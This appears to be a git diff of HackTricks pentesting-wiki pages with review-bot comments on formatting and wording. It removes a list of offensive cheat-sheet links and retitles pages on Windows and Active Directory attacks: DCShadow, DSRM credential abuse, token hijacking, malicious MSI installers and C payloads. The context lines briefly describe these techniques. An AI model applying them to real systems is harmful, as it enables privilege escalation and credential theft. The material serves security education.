-{{#include ../banners/hacktricks-training.md}}
-
-{{#ref}}
-https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
-{{#endref}}
-
-{{#ref}}
-https://hausec.com/pentesting-cheatsheet/#_Toc475368982
-{{#endref}}
-
-{{#ref}}
-https://anhtai.me/pentesting-cheatsheet/
-{{#endref}}
-
-{{#ref}}
-https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
-{{#endref}}
-
-{{#ref}}
-https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
-{{#endref}}
-
-{{#ref}}
-https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
-{{#endref}}
-
-{{#ref}}
-https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
-{{#endref}}
-
-{{#ref}}
-https://anhtai.me/oscp-fun-guide/
-{{#endref}}
-
-{{#ref}}
-https://www.thehacker.recipes/
-{{#endref}}
-
-{{#ref}}
-https://github.com/swisskyrepo/PayloadsAllTheThings
-{{#endref}}
-
-{{#ref}}
-https://gtfobins.github.io/
-{{#endref}}
-
-{{#ref}}
-https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
-{{#endref}}
-
-{{#ref}}
-https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
-{{#endref}}
-
-{{#ref}}
-https://hideandsec.sh/
-{{#endref}}
-
-{{#ref}}
-https://cheatsheet.haax.fr/
-{{#endref}}
-
-{{#ref}}
-https://infosecwriteups.com/
-{{#endref}}
-
-{{#ref}}
-https://www.exploit-db.com/
-{{#endref}}
-
-{{#ref}}
-https://wadcoms.github.io/
-{{#endref}}
-
-{{#ref}}
-https://lolbas-project.github.io
-{{#endref}}
-
-{{#ref}}
-https://pentestbook.six2dez.com/
-{{#endref}}
-
-{{#ref}}
-https://www.hackingarticles.in/
-{{#endref}}
-
-{{#ref}}
-https://pentestlab.blog/
-{{#endref}}
-
-{{#ref}}
-https://ippsec.rocks/
-{{#endref}}
-
-{{#include ../banners/hacktricks-training.md}}
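Review bot: this removes 23 external references (GTFOBins, LOLBAS, PayloadsAllTheThings, exploit-db and others) rather than just a placeholder page; if the goal is to clean up the TODO folder, confirm these links already appear on the relevant methodology pages before dropping them, and remove the corresponding `SUMMARY.md` entry in the same commit so no dangling chapter remains.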
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index da5d84b04..f29bcfdb4 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -1,3 +1,5 @@
+# Information in Printers
+
 {{#include ../../banners/hacktricks-training.md}}
 
 There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index 2291069dc..c0b1a41d0 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -1,6 +1,9 @@
+# DCShadow
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# DCShadow
+
+## Basic Information
 
 It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
 Note that if you use wrong data, pretty ugly logs will appear.
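Review bot: replacing `# DCShadow` with an empty `+` line plus `+## Basic Information` leaves two blank lines between the banner include and the new subheading; drop the added empty line so the spacing matches the other files in this patch.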
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index f9f38abe2..754ae91b4 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -1,6 +1,8 @@
+# DSRM Credentials
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# DSRM Credentials
+## Basic Information
 
 There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
 First we need to **dump** the **hash** of the **local Administrator** user inside the DC:
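Review bot: the unchanged context under the new `## Basic Information` heading has a grammar slip worth fixing while here: `modifying a registry to **activate this password** so you can remotely access to this local Administrator user` should read `modifying a registry key to **activate this password** so you can remotely access this local Administrator account`.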
diff --git a/src/windows-hardening/mythic.md b/src/windows-hardening/mythic.md
index 177124cd2..6dff9ee21 100644
--- a/src/windows-hardening/mythic.md
+++ b/src/windows-hardening/mythic.md
@@ -1,4 +1,6 @@
-# Mythic
+# Mythic
+
+{{#include ../banners/hacktricks-training.md}}
 
 ## What is Mythic?
 
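Review bot: the `-# Mythic` / `+# Mythic` pair shows no visible difference, so this line change is most likely a trailing-whitespace or line-ending (CRLF) fix; fine if intentional, but worth confirming it is not an accidental editor rewrite of the first line.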
@@ -174,3 +176,5 @@ When user over linux it has some interesting commands:
 - `run`: Execute a command from disk with arguments, allowing for the execution of binaries or scripts on the target system.
 - `pty`: Open up an interactive PTY, allowing for direct interaction with the shell on the target system.
 
+
+{{#include ../banners/hacktricks-training.md}}
\ No newline at end of file
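Review bot: the added trailing banner include ends with `\ No newline at end of file`; add the final newline, as the other files touched here have one. The hunk-header context `When user over linux it has some interesting commands:` should also read `When used on Linux it has some interesting commands:`.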
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index e970ad22b..f93e1f653 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -1,3 +1,5 @@
+# WTS Impersonator
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The **WTS Impersonator** tool exploits the **"\\pipe\LSM_API_service"** RPC Named pipe to stealthily enumerate logged-in users and hijack their tokens, bypassing traditional Token Impersonation techniques. This approach facilitates seamless lateral movements within networks. The innovation behind this technique is credited to **Omri Baso, whose work is accessible on [GitHub](https://github.com/OmriBaso/WTSImpersonator)**.
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 06a9bfe5c..3d0fba043 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -1,3 +1,5 @@
+# AppendData/AddSubdirectory Permission over Service Registry
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **The original post is** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index 66585f6d9..3bb6dc73e 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -1,7 +1,7 @@
-{{#include ../../banners/hacktricks-training.md}}
-
 # Creating Malicious MSI and Getting Root
 
+{{#include ../../banners/hacktricks-training.md}}
+
 The creation of the MSI installer will be done using wixtools, specifically [wixtools](http://wixtoolset.org) will be utilized. It is worth mentioning that alternative MSI builders were attempted, but they were not successful in this particular case.
 
 For a comprehensive understanding of wix MSI usage examples, it is advisable to consult [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with). Here, you can find various examples that demonstrate the usage of wix MSI.
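Review bot: moving the banner below the title is consistent with the rest of the patch; the unchanged context `will be done using wixtools, specifically [wixtools](http://wixtoolset.org)` is redundant and would read better as `will be done using the [WiX Toolset](http://wixtoolset.org)`.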
diff --git a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index 4d966072f..6969c4822 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -1,3 +1,5 @@
+# From High Integrity to SYSTEM with Name Pipes
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **Code flow:**
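Review bot: the new title `# From High Integrity to SYSTEM with Name Pipes` should read `Named Pipes`; the typo in the filename does not need to propagate into the displayed page title.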
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 40537a484..8e3120859 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -8,7 +8,7 @@ In Windows Vista and later versions, all protected items come with an **integrit
 
 A key rule is that objects can't be modified by processes with a lower integrity level than the object's level. The integrity levels are:
 
-- **Untrusted**: This level is for processes with anonymous logins. %%%Example: Chrome%%%
+- **Untrusted**: This level is for processes with anonymous logins. Example: Chrome
 - **Low**: Mainly for internet interactions, especially in Internet Explorer's Protected Mode, affecting associated files and processes, and certain folders like the **Temporary Internet Folder**. Low integrity processes face significant restrictions, including no registry write access and limited user profile write access.
 - **Medium**: The default level for most activities, assigned to standard users and objects without specific integrity levels. Even members of the Administrators group operate at this level by default.
 - **High**: Reserved for administrators, allowing them to modify objects at lower integrity levels, including those at the high level itself.
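Review bot: the `%%%...%%%` markers look like a review placeholder, and stripping them leaves `Example: Chrome` as the example for the Untrusted level, which is imprecise: it is Chrome's sandboxed renderer processes that run at Untrusted integrity, while the main browser process runs at Medium like any other user application; suggest `Example: Chrome's sandboxed renderer processes`.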
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 9ce74e175..598f52b32 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -1,3 +1,6 @@
+# SeDebug + SeImpersonate - Copy Token
+
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The following code **exploits the privileges SeDebug and SeImpersonate** to copy the token from a **process running as SYSTEM** and with **all the token privileges**. \
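Review bot: two blank `+` lines were added between the new title and the banner include; the other files in this patch use a single blank line, so drop the extra one.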
diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
index ca976e406..ed4168f60 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
@@ -1,6 +1,8 @@
+# Windows C Payloads
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# Add user
+## Add user
 
 ```c
 // i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c